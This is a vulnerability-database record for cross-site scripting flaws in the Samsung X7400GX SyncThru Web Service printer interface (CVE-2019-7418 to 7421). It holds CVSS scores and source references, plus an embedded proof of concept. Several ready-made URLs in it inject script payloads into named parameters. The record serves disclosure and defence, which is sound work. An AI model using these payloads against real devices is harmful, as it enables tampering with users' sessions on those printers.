var-201903-0464
Vulnerability from variot
SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:samsung:syncthru_web_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:x7400gx_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7421",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-7421",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158856",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-7421",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7421",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7421",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158856",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7421",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158856",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"id": "VAR-201903-0464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:08.701000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.samsung.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89375"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.8,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.7,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"date": "2019-03-21T16:01:13.063000",
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"date": "2024-11-21T04:48:11.733000",
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…